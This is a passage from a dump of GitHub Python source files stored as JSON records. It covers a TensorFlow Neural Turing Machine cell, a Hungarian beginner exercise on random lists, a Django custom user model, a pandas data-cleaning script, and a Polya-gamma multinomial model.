output_dim = x.get_shape()[1]\n else:\n output_dim = self.output_dim\n with tf.variable_scope(\"o2o\", reuse=tf.AUTO_REUSE):\n read_vector_list = (ext_read_vector_list if self.use_ext_memory else []) + \\\n (att_read_vector_list if self.use_att_memory else [])\n\n NTM_output = tf.contrib.layers.fully_connected(\n tf.concat([controller_output] + read_vector_list, axis=1), output_dim, activation_fn=None,\n weights_initializer=self.o2o_initializer)\n NTM_output = tf.clip_by_value(NTM_output, -self.clip_value, self.clip_value)\n\n if self.dropout > 0.0:\n NTM_output = tf.nn.dropout(NTM_output, 1-self.dropout)\n\n self.step += 1\n\n if self.use_att_memory:\n map(lambda v: v.set_shape([None, self.att_memory_vector_dim]), att_read_vector_list)\n map(lambda v: v.set_shape([None, self.att_memory_size]), att_w_list)\n if self.use_ext_memory:\n map(lambda v: v.set_shape([None, self.ext_memory_vector_dim]), ext_read_vector_list)\n map(lambda v: v.set_shape([None, self.ext_memory_size]), ext_w_list)\n\n if self.use_att_memory and self.use_ext_memory:\n return NTM_output, tuple(Model2NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[prev_state.ext_w_history[i].write(prev_state.time, ext_w_list[i]) for i in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else prev_state.ext_w_history,\n ext_M=ext_M,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=prev_state.att_w_history.write(prev_state.time, att_w_list[0]) if self.record_w_history else prev_state.att_w_history,\n att_M=att_M,\n prev_output=NTM_output))\n elif self.use_att_memory:\n return NTM_output, tuple(Model1NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=prev_state.att_w_history.write(prev_state.time, att_w_list[0]) if self.record_w_history else prev_state.att_w_history,\n att_M=att_M,\n prev_output=NTM_output))\n else:\n return NTM_output, tuple(Model3NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[prev_state.ext_w_history[i].write(prev_state.time, ext_w_list[i]) for i in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else prev_state.ext_w_history,\n ext_M=ext_M,\n prev_output=NTM_output))\n\n def addressing(self, k, beta, g, s, gamma, prev_M, prev_w, att=True):\n k = tf.expand_dims(k, axis=2)\n inner_product = tf.matmul(prev_M, k)\n if att:\n inner_product = tf.squeeze(inner_product, axis=2)\n w_c = tf.nn.softmax(tf.expand_dims(beta, axis=1) * inner_product, dim=1)\n else:\n k_norm = tf.sqrt(tf.reduce_sum(tf.square(k), axis=1, keep_dims=True))\n M_norm = tf.sqrt(tf.reduce_sum(tf.square(prev_M), axis=2, keep_dims=True))\n norm_product = M_norm * k_norm\n K = tf.squeeze(inner_product / (norm_product + 1e-8)) # eq (6)\n\n # Calculating w^c\n\n K_amplified = tf.exp(tf.expand_dims(beta, axis=1) * K)\n w_c = K_amplified / tf.reduce_sum(K_amplified, axis=1, keep_dims=True) # eq (5)\n\n w_c = tf.squeeze(w_c)\n\n if att:\n w_c.set_shape([None, self.att_memory_size])\n else:\n w_c.set_shape([None, self.ext_memory_size])\n\n if self.addressing_mode == 'content': # Only focus on content\n return w_c\n\n # Sec 3.3.2 Focusing by Location\n\n g = tf.expand_dims(g, axis=1)\n w_g = g * w_c + (1 - g) * prev_w # eq (7)\n\n if att:\n s = tf.concat([s[:, :self.shift_range + 1],\n tf.zeros([self.batch_size, self.att_memory_size - (self.shift_range * 2 + 1)]),\n s[:, -self.shift_range:]], axis=1)\n t = tf.concat([tf.reverse(s, axis=[1]), tf.reverse(s, axis=[1])], axis=1)\n s_matrix = tf.stack(\n [t[:, self.att_memory_size - i - 1:self.att_memory_size * 2 - i - 1] for i in range(self.att_memory_size)],\n axis=1\n )\n else:\n s = tf.concat([s[:, :self.shift_range + 1],\n tf.zeros([self.batch_size, self.ext_memory_size - (self.shift_range * 2 + 1)]),\n s[:, -self.shift_range:]], axis=1)\n t = tf.concat([tf.reverse(s, axis=[1]), tf.reverse(s, axis=[1])], axis=1)\n s_matrix = tf.stack(\n [t[:, self.ext_memory_size - i - 1:self.ext_memory_size * 2 - i - 1] for i in range(self.ext_memory_size)],\n axis=1\n )\n \n w_ = tf.reduce_sum(tf.expand_dims(w_g, axis=1) * s_matrix, axis=2) # eq (8)\n w_sharpen = tf.pow(w_, tf.expand_dims(gamma, axis=1))\n w = w_sharpen / tf.reduce_sum(w_sharpen, axis=1, keep_dims=True) # eq (9)\n\n return w\n\n def zero_state(self, batch_size, dtype):\n with tf.variable_scope('init', reuse=self.reuse):\n controller_init_state = self.controller.zero_state(batch_size, dtype)\n prev_output = tf.zeros([batch_size, self.output_dim])\n\n if self.use_ext_memory:\n ext_read_vector_list = [expand(tf.tanh(learned_init(self.ext_memory_vector_dim)), dim=0, N=batch_size, dims=1)\n for i in range(self.ext_read_head_num)]\n\n ext_w_list = [expand(tf.nn.softmax(learned_init(self.ext_memory_size)), dim=0, N=batch_size, dims=1)\n for i in range(self.ext_read_head_num + self.ext_write_head_num)]\n\n # ext_M = expand(tf.tanh(learned_init(self.ext_memory_size * self.ext_memory_vector_dim)), dim=0, N=batch_size, dims=1)\n\n ext_M = expand(tf.get_variable('init_M', self.ext_memory_size * self.ext_memory_vector_dim,\n initializer=tf.constant_initializer(1e-6)),\n dim=0, N=batch_size, dims=1)\n\n if self.use_att_memory:\n att_read_vector_list = [expand(tf.tanh(learned_init(self.att_memory_vector_dim)), dim=0, N=batch_size, dims=1)]\n att_w_list = [expand(tf.nn.softmax(learned_init(self.att_memory_size)), dim=0, N=batch_size, dims=1)]\n\n if self.use_att_memory and self.use_ext_memory:\n # tmp_att_M = tf.reshape(self.att_M, [-1, self.att_memory_size, self.att_memory_vector_dim])\n # m = tf.contrib.layers.fully_connected(tf.reduce_mean(tmp_att_M, axis=1), self.ext_memory_vector_dim,\n # activation_fn=tf.tanh, weights_initializer=create_linear_initializer(self.att_memory_vector_dim))\n # ext_M = tf.tile(tf.expand_dims(m, 1), multiples=[1, self.ext_memory_size, 1]) + tf.random_normal([batch_size, self.ext_memory_size, self.ext_memory_vector_dim], stddev=0.316)\n # ext_M = tf.reshape(ext_M, [-1, self.ext_memory_size * self.ext_memory_vector_dim])\n\n # return tuple(Model2NTMState(\n # controller_state=controller_init_state,\n # ext_read_vector_list=ext_read_vector_list,\n # ext_w_list=ext_w_list,\n # ext_M=ext_M,\n # att_read_vector_list=att_read_vector_list,\n # att_w_list=att_w_list,\n # att_M=self.att_M,\n # prev_output=prev_output))\n\n return tuple(Model2NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n ext_M=ext_M,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n att_M=self.att_M,\n prev_output=prev_output))\n elif self.use_att_memory:\n return tuple(Model1NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=tf.TensorArray(dtype=dtype, size=0, dynamic_size=True)if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n att_M=self.att_M,\n prev_output=prev_output))\n else:\n return tuple(Model3NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n ext_M=ext_M,\n prev_output=prev_output))\n\n @property\n def state_size(self):\n if self.use_att_memory and self.use_ext_memory:\n return tuple(Model2NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n controller_state=self.controller.state_size,\n ext_read_vector_list=[self.ext_memory_vector_dim for _ in range(self.ext_read_head_num)],\n ext_w_list=[self.ext_memory_size for _ in range(self.ext_read_head_num + self.ext_write_head_num)],\n ext_w_history=[tuple() for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.TensorShape([1]),\n ext_M=tf.TensorShape([self.ext_memory_size * self.ext_memory_vector_dim]),\n att_read_vector_list=[self.att_memory_vector_dim],\n att_w_list=[self.att_memory_size],\n att_w_history=tuple() if self.record_w_history else tf.TensorShape([1]),\n att_M=tf.TensorShape([self.att_memory_size * self.att_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n elif self.use_att_memory:\n return tuple(Model1NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n controller_state=self.controller.state_size,\n att_read_vector_list=[self.att_memory_vector_dim],\n att_w_list=[self.att_memory_size],\n att_w_history=tuple() if self.record_w_history else tf.TensorShape([1]),\n att_M=tf.TensorShape([self.att_memory_size * self.att_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n else:\n return tuple(Model3NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n controller_state=self.controller.state_size,\n ext_read_vector_list=[self.ext_memory_vector_dim for _ in range(self.ext_read_head_num)],\n ext_w_list=[self.ext_memory_size for _ in range(self.ext_read_head_num + self.ext_write_head_num)],\n ext_w_history=[tuple() for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.TensorShape([1]),\n ext_M=tf.TensorShape([self.ext_memory_size * self.ext_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n\n @property\n def output_size(self):\n return self.output_dim\n","repo_name":"MarkPKCollier/MANNs4NMT","sub_path":"nmt/ntm.py","file_name":"ntm.py","file_ext":"py","file_size_in_byte":21401,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"702672322","text":"from typing import *\nimport random\nimport os\nimport time\n\nhalmaz1: List[int] = []\nhalmaz2: List[int] = []\nosszeg:int = 0\n\ndef szamBeolvasasa(mini:int, maxi:int)-> int:\n eredmeny:int = None\n while(eredmeny == None or eredmeny<mini or eredmeny>maxi):\n data:str=input(\"Kérem adja meg az elemek számát: \")\n if(data.isdigit()):\n eredmeny = int(data)\n if(eredmeny>maxi or eredmeny<mini):\n print(\"Nem határértéken belüli számot adott meg!\")\n else:\n print(\"Nem számot adott meg!\")\n time.sleep(2)\n os.system(\"cls\")\n\n return eredmeny\n\ndef listaFeltolteseRandomSzamokkal(elem:int)->List[int]:\n eredmeny: List[int] = []\n for i in range(elem + 1):\n eredmeny.append(random.randint(-100,100))\n\n return eredmeny\n\n\ndef halmazKiirasa(kiirandoHalmaz:List[int])-> None:\n for item in kiirandoHalmaz:\n print(f\"{item}\", end=\"\\t\")\n\ndef halmazKiirasa2(kiirandoHalmaz:List[int])-> None:\n for item in kiirandoHalmaz:\n print(f\"{item}\", end=\"\\t\")\n\ndef novekvosorrendukiiras(keresesHalmaza:List[int])-> List[int]:\n temp:int = None\n for i in range(0, len(keresesHalmaza), 1):\n for j in range(i + 1, len(keresesHalmaza), 1):\n if(keresesHalmaza[j] < keresesHalmaza[i]):\n temp = keresesHalmaza[i]\n keresesHalmaza[i] = keresesHalmaza[j]\n keresesHalmaza[j] = temp\n return keresesHalmaza\n\ndef osszeadas(keresesHalmaza:List[int])-> int:\n osszeg: int = 0\n for item in keresesHalmaza:\n osszeg+=item\n\n return osszeg \n\n\"\"\"def listaosszefuzes(halmaz1:List[int], halmaz2:List[int])->List[int]:\n eredmeny:List[int]=halmaz1.copy()\n for item in halmaz2:\n eredmeny.append(item)\n\n megoldás 2\n eredmeny:List[int]=halmaz1.copy()\n eredmeny += halmaz2.copy()\n \n return eredmeny\n\"\"\"\n#főprogram\nelemszam = szamBeolvasasa(1,5)\nhalmaz1 = listaFeltolteseRandomSzamokkal(elemszam)\nelemszam2 = szamBeolvasasa(5,10)\nhalmaz2 = listaFeltolteseRandomSzamokkal(elemszam2)\nhalmazKiirasa(halmaz1)\nhalmazKiirasa2(halmaz2)\nnovekvosorrend: List[int] = novekvosorrendukiiras(halmaz1+halmaz2)\nprint(f\"\\n A halmaz növekvő sorrendben: {novekvosorrend}\")\nosszeg = osszeadas(halmaz1+halmaz2)\nprint(f\"A halmaz átlaga: {osszeg/(elemszam+elemszam2)}\")","repo_name":"T0m134/Python","sub_path":"09-Halmazok/Feladat 6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15963373227","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n# Create your models here.\n\nGENDER_CHOICES = (\n ('M', 'Male'),\n ('F', 'Female'),\n ('NS', 'Not Set'),\n)\n\n'''\n Custom user class for user registerations. Add all the desired properties here\n'''\nclass CustomUser(AbstractUser):\n gender = models.CharField(max_length = 2, choices = GENDER_CHOICES, default = GENDER_CHOICES[2][0])\n\n class Meta:\n unique_together = ('email',)\n verbose_name = 'User'\n\n","repo_name":"aakash-cr7/django-registeration","sub_path":"account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74113787047","text":"# Cleaning functions\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef remove_obvious_outliers(_outliers,df):\n summary = {}\n outliers = _outliers['outliers']\n for outlier in outliers:\n col_name = outlier['column']\n summary[col_name] = {'range-drops':0,'category-drops':0}\n\n\n if 'range' in outlier:\n #print('range')\n\n low = outlier['range'][0]\n high = outlier['range'][1]\n sz = len(df)\n #print('colname: ', col_name)\n #print('type: ',type(low))\n\n if isinstance(low, np.datetime64):\n df = df[(df[col_name].to_datetime() >= low) & (df[col_name].to_datetime() <= high)]\n else:\n df = df[(df[col_name] >= low) & (df[col_name] <= high)]\n\n\n summary[col_name]['range-drops'] = sz - len(df)\n\n elif 'categories' in outlier:\n #print('categories')\n #col_name = outlier['column']\n\n _list = outlier['categories']\n sz = len(df)\n df = df[df[col_name].isin(_list)]\n\n summary[col_name]['category-drops'] = sz - len(df)\n\n return df, summary\n\ndef change_types(converts,df):\n summary = {}\n conversions = converts['conversions']\n straight_conversions = [x for x in conversions if not 'categories' in x]\n\n cat_conversions = [x for x in conversions if 'categories' in x]\n t = time.process_time()\n for cv in conversions:\n summary[cv['column']]={'int':False,'float':False,'datetime':False,'categorize':False}\n elapsed_time = time.process_time() - t\n print('E1 time: ', elapsed_time)\n t = time.process_time()\n for cv in straight_conversions:\n col_name = cv['column']\n\n if cv['to'] == 'int':\n df[cv['column']] = df[cv['column']].astype(int)\n summary[col_name]['int'] = True\n if cv['to'] == 'float':\n df[cv['column']] = df[cv['column']].astype(float)\n summary[col_name]['float'] = True\n if cv['to'] == 'datetime':\n df[cv['column']] = pd.to_datetime(df[cv['column']])\n summary[col_name]['datetime'] = True\n\n elapsed_time = time.process_time() - t\n print('E2 time: ', elapsed_time)\n\n t = time.process_time()\n new_cols = {}\n if len(cat_conversions): # ignore if nothing configured\n for index, row in df.iterrows(): # for each row\n for col_name in df.columns: # each column\n for conv in cat_conversions: # each cat config\n cat_col = conv['column']\n for cat in conv['categories']:\n if col_name == cat_col : # config colname == row[col_name]\n cat_value = cat['value']\n cat_cat = cat['category']\n if cat_value == row[col_name]: # conf value == row value\n if not col_name in new_cols:\n\n new_cols[col_name]=[cat_cat]\n summary[col_name]['categorize'] = True\n\n else:\n\n new_cols[col_name].append(cat_cat)\n\n\n\n elapsed_time = time.process_time() - t\n print('E3 time: ', elapsed_time)\n\n # add converted cols back into dataframe\n t = time.process_time()\n for colname in new_cols:\n df = df.drop(colname,1)\n df[colname]=new_cols[colname]\n elapsed_time = time.process_time() - t\n print('E4 time: ', elapsed_time)\n return df, summary\n\ndef get_clean_column_names(actual_col_list):\n '''\n convert each column to lowercase with underscore seperation\n\n e.g., ID to id\n e.g., County ID to county_id\n e.g., County-ID to county_id\n :param actual_col_list: list of column names\n :return: clean list of column names\n\n {\n 'field-name': {}\n }\n\n '''\n summary_results = {} # summarize what happened\n clean_column_names = []\n for cn in actual_col_list:\n summary_results[cn] = {}\n ncn = cn\n # get rid of some unwanted characters\n summary_results[cn]['blanks'] = False\n if ' ' in cn:\n ncn = cn.replace(' ','_')\n summary_results[cn]['blanks']=True\n\n\n summary_results[cn]['dashes'] = False\n if '-' in cn:\n ncn = cn.replace('-', '_')\n summary_results[cn]['spaces'] = True\n # force first char to lower case\n nncn = ncn\n ncn = ''\n prev_upper = True #False\n case = False\n camelcase = False\n for c in nncn:\n if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n case = True\n if prev_upper:\n ncn += c.lower()\n else:\n ncn += '_' + c.lower()\n camelcase = True\n prev_upper = True\n else:\n ncn += c\n prev_upper = False\n\n summary_results[cn]['case'] = case\n summary_results[cn]['camelcase'] = camelcase\n summary_results[cn]['clean-name']=ncn\n\n clean_column_names.append(ncn)\n\n return clean_column_names, summary_results\n\ndef get_clean_column_names_lean(actual_col_list):\n '''\n convert each column to lowercase with underscore seperation\n e.g., ID to id\n e.g., County ID to county_id\n e.g., County-ID to county_id\n :param actual_col_list: list of column names\n :return: clean list of column names\n '''\n clean_column_names = []\n for cn in actual_col_list:\n\n ncn = cn\n # get rid of some unwanted characters\n if ' ' in cn:\n ncn = cn.replace(' ','_')\n if '-' in cn:\n ncn = cn.replace('-', '_')\n # force first char to lower case\n nncn = ncn\n ncn = ''\n prev_upper = True #False\n for c in nncn:\n if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n if prev_upper:\n ncn += c.lower()\n else:\n ncn += '_' + c.lower()\n prev_upper = True\n else:\n ncn += c\n prev_upper = False\n\n clean_column_names.append(ncn)\n\n return clean_column_names\n\ndef main():\n print('###############################')\n '''\n print('TEST: get_clean_column_names')\n\n col_nms = ['PatientId','AppointmentID','Gender',\n 'ScheduledDay','AppointmentDay','Age',\n 'Neighbourhood','Scholarship','Hipertension',\n 'Diabetes','Alcoholism','Handcap','SMS_received',\n 'No-show']\n # go get clean columns\n actual_cols = get_clean_column_names_lean(col_nms)\n print('actual_cols: ', actual_cols)\n # expected results\n expected_cols = ['patient_id','appointment_id','gender',\n 'scheduled_day','appointment_day','age',\n 'neighbourhood','scholarship','hipertension',\n 'diabetes','alcoholism','handcap','sms_received',\n 'no_show']\n\n assert actual_cols == expected_cols\n\n actual=cols, results = get_clean_column_names(col_nms)\n\n print('results: ',results)\n\n '''\n df_data = pd.DataFrame({\n 'A': ['1','2','3','24','55','6','70'],\n 'B': ['Yes','No','Yes','No','Yea','Nay','Yes'],\n 'C': ['2011-01-01 01:00:00', '2012-01-01 02:00:00', '2013-01-01 03:00:00', '2014-01-01 03:00:00', '2015-01-01 04:00:00', '2016-01-01 05:00:00', '2017-01-01 06:00:00'],\n 'D': [True,False,True,False,True,False,True],\n 'E': [1,2,3,24,55,6,70],\n 'F': ['M','F','M','F','M','F','M']\n }\n )\n\n # age to age category conversion\n yes_no = [\n {'value': 'Yes', 'category': 1},\n {'value': 'No', 'category': 0},\n {'value': 'Yea', 'category': 1},\n {'value': 'Nay', 'category': 0}\n ]\n\n true_false = [\n {'value': True, 'category': 1},\n {'value': False, 'category': 0}\n ]\n\n _converts = {\n 'conversions': [\n {'column': 'C', 'range': (pd.to_datetime('2016-01-01'), pd.to_datetime('2017-01-01'))},\n\n {'column': 'A', 'to': 'int'},\n {'column': 'B', 'to': 'int', 'categories':yes_no},\n {'column': 'C', 'to': 'datetime'},\n {'column': 'D', 'to': 'int', 'categories':true_false}\n\n ]\n }\n\n #df,convert_summary = get_type_changes(_converts, df_data)\n\n #print(df.info())\n #print(convert_summary)\n\n print('################ Outliers')\n _outliers = {\n 'outliers': [\n\n {'column':'C','range': (pd.to_datetime('2016-01-01'), pd.to_datetime('2017-01-01'))},\n #{'column': 'A', 'range': (1, 69)},\n #{'column':'F','categories':['M']}\n ]\n }\n df_data['C'] = pd.to_datetime(df_data['C'])\n df_data.info()\n\n remove_obvious_outliers(_outliers, df_data)\n\n #df, outlier_summary = get_with_outliers_removed(_outliers, df)\n #print('outlier_summary: ', outlier_summary)\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","repo_name":"citizenlabsgr/adopt-a-drain","sub_path":"notebook/lib/p3_clean 2.py","file_name":"p3_clean 2.py","file_ext":"py","file_size_in_byte":9132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1017499157","text":"\nimport numpy as np\nfrom numpy.linalg import inv, solve\n\nfrom scipy.special import gammaln\nfrom scipy.misc import logsumexp\n\nfrom pybasicbayes.abstractions import Distribution, GibbsSampling, Model\nfrom pybasicbayes.distributions import Multinomial\n\nfrom pgmult.utils import kappa_vec, N_vec, pi_to_psi, psi_to_pi, \\\n ln_psi_to_pi, ln_pi_to_psi, initialize_polya_gamma_samplers, \\\n compute_psi_cmoments\n\nimport pypolyagamma as ppg\n\nclass PGMultinomial(GibbsSampling):\n \"\"\"\n A base class for the Polya-gamma augmented multinomial distribution.\n The parameter of the multinomial distribution, \\pi, is obtained by\n transforming the Gaussian-distributed vector, \\psi. To perform inference\n over \\psi given multinomial observations, we augment the distribution\n with a Polya-gamma distributed vector \\omega. The transformation from\n \\psi to \\pi is given by:\n\n \\pi_1 = \\sigma(\\psi_1)\n \\pi_k = \\sigma(\\psi_k) (1-\\sum_{j < k} \\pi_j) for k = 2..K-1\n \\pi_K = 1-\\sum_{j<K} \\pi_j\n\n where \\sigma is the logistic function mapping reals to [0,1].\n \"\"\"\n\n def __init__(self, K, pi=None, psi=None, mu=None, Sigma=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param pi: Multinomial probability vector (must sum to 1)\n :param psi: Transformed multinomial probability vector\n :param mu: Mean of \\psi\n :param Sigma: Covariance of \\psi\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n if all(param is None for param in (pi,psi,mu,Sigma)):\n mu, sigma = compute_psi_cmoments(np.ones(K))\n Sigma = np.diag(sigma)\n\n if pi is not None:\n if not (isinstance(pi, np.ndarray) and pi.shape == (K,)\n and np.isclose(pi.sum(), 1.0)):\n raise ValueError(\"Pi must be a normalized length-K vector\")\n self.pi = pi\n\n if psi is not None:\n if not (isinstance(psi, np.ndarray) and psi.shape == (K-1,)):\n raise ValueError(\"Psi must be a (K-1) vector of reals\")\n self.psi = psi\n\n if mu is not None and Sigma is not None:\n if not (isinstance(mu, np.ndarray) and mu.shape == (K-1,)):\n raise ValueError(\"Mu must be a (K-1) vector\")\n if not (isinstance(Sigma, np.ndarray) and Sigma.shape == ((K-1), (K-1))):\n raise ValueError(\"Sigma must be a K-1 Covariance matrix\")\n self.mu = mu\n self.Sigma = Sigma\n\n # If psi and pi have not been given, sample from the prior\n if psi is None and pi is None:\n self.psi = np.random.multivariate_normal(self.mu, self.Sigma)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n self.omega = np.ones(self.K-1)\n\n @property\n def pi(self):\n return psi_to_pi(self.psi)\n\n @pi.setter\n def pi(self, value):\n self.psi = pi_to_psi(value)\n\n def log_likelihood(self, x):\n ll = 0\n ll += gammaln((x+1).sum()) - gammaln(x+1).sum()\n ll += (x * np.log(self.pi)).sum()\n return ll\n\n def rvs(self, size=1, N=1):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n # assert self.mu is not None and self.Sigma is not None, \"mu and sigma are not specified!\"\n # psis = np.random.multivariate_normal(self.mu, self.Sigma, size=size)\n # pis = np.empty((size, self.K))\n # for i in xrange(size):\n # pis[i,:] = psi_to_pi(psis[i,:])\n # return pis\n\n # Sample from the multinomial distribution\n return np.random.multinomial(N, self.pi, size=size)\n\n def resample(self, x=None):\n if x is None:\n x = np.zeros((0,self.K))\n\n self.resample_omega(x)\n self.resample_psi(x)\n\n def conditional_psi(self, x):\n \"\"\"\n Compute the conditional distribution over psi given observation x and omega\n :param x:\n :return:\n \"\"\"\n assert x.ndim == 2\n Omega = np.diag(self.omega)\n Sigma_cond = inv(Omega + inv(self.Sigma))\n\n # kappa is the mean dot precision, i.e. the sufficient statistic of a Gaussian\n # therefore we can sum over datapoints\n kappa = kappa_vec(x).sum(0)\n mu_cond = Sigma_cond.dot(kappa +\n solve(self.Sigma, self.mu))\n\n return mu_cond, Sigma_cond\n\n def resample_psi(self, x):\n mu_cond, Sigma_cond = self.conditional_psi(x)\n self.psi = np.random.multivariate_normal(mu_cond, Sigma_cond)\n\n def resample_omega(self, x):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n assert x.ndim == 2\n N = N_vec(x)\n\n # Sum the N's (i.e. the b's in the denominator)\n NN = N.sum(0).astype(np.float)\n ppg.pgdrawvpar(self.ppgs, NN, self.psi, self.omega)\n\n\nclass PGMultinomialRegression(Distribution):\n \"\"\"\n z ~ Norm(.,.) eg. Latent state of an LDS\n x ~ Mult(N, Cz)\n \"\"\"\n def __init__(self, K, n, C=None, sigma_C=1, mu=None, mu_pi=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param mu_C: Mean of the matrix normal distribution over C\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n assert isinstance(n, int) and n >= 1, \"n must be an integer >= 1\"\n self.n = n\n\n # Initialize emission matrix C\n self.sigma_C = sigma_C\n if C is None:\n self.C = self.sigma_C * np.random.randn(self.K-1, self.n)\n # mu, sigma = compute_psi_cmoments(np.ones(K))\n # self.C = compute_psi_cmoments(np.ones(K))[0][:,None] * np.ones((self.K-1, self.n))\n else:\n assert C.shape == (self.K-1, self.n)\n self.C = C\n\n # Initialize the observation mean (mu)\n if mu is None and mu_pi is None:\n self.mu = np.zeros(self.K-1)\n elif mu is not None:\n assert mu.shape == (self.K-1,)\n self.mu = mu\n else:\n assert mu_pi.shape == (self.K,)\n self.mu = pi_to_psi(mu_pi)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n\n def augment_data(self, augmented_data):\n \"\"\"\n Augment the data with auxiliary variables\n :param augmented_data:\n :return:\n \"\"\"\n x = augmented_data[\"x\"]\n T, K = x.shape\n assert K == self.K\n\n augmented_data[\"kappa\"] = kappa_vec(x)\n augmented_data[\"omega\"] = np.ones((T,K-1))\n\n self.resample_omega([augmented_data])\n\n return augmented_data\n\n def psi(self, data):\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states!\")\n\n psi = z.dot(self.C.T) + self.mu[None,:]\n return psi\n\n def pi(self, data):\n psi = self.psi(data)\n # pi = np.array([psi_to_pi(p) for p in psi])\n pi = psi_to_pi(psi)\n return pi\n\n def log_likelihood(self, data):\n x = data[\"x\"]\n pi = self.pi(data)\n pi = np.clip(pi, 1e-16, 1-1e-16)\n\n # Compute the multinomial log likelihood given psi\n assert x.shape == pi.shape\n ll = 0\n ll += gammaln(x.sum(axis=1) + 1).sum() - gammaln(x+1).sum()\n ll += (x * np.log(pi)).sum()\n return ll\n\n def rvs(self, z, N=1, full_output=False):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n T,D = z.shape\n psis = z.dot(self.C.T) + self.mu[None, :]\n pis = np.zeros((T, self.K))\n xs = np.zeros((T, self.K))\n for t in range(T):\n pis[t,:] = psi_to_pi(psis[t,:])\n xs[t,:] = np.random.multinomial(N, pis[t,:])\n\n if full_output:\n return pis, xs\n else:\n return xs\n\n def resample(self, augmented_data_list):\n self.resample_C(augmented_data_list)\n self.resample_omega(augmented_data_list)\n\n def resample_C(self, augmented_data_list):\n \"\"\"\n Resample the observation vectors. Since the emission noise is diagonal,\n we can resample the rows of C independently\n :return:\n \"\"\"\n # Get the prior\n prior_precision = 1./self.sigma_C * np.eye(self.n)\n prior_mean = np.zeros(self.n)\n prior_mean_dot_precision = prior_mean.dot(prior_precision)\n\n # Get the sufficient statistics from the likelihood\n lkhd_precision = np.zeros((self.K-1, self.n, self.n))\n lkhd_mean_dot_precision = np.zeros((self.K-1, self.n))\n\n for data in augmented_data_list:\n # Compute the residual activation from other components\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states in augmented data!\")\n\n # Get the observed mean and variance\n omega = data[\"omega\"]\n kappa = data[\"kappa\"]\n prec_obs = omega\n mu_obs = kappa / omega - self.mu[None, :]\n 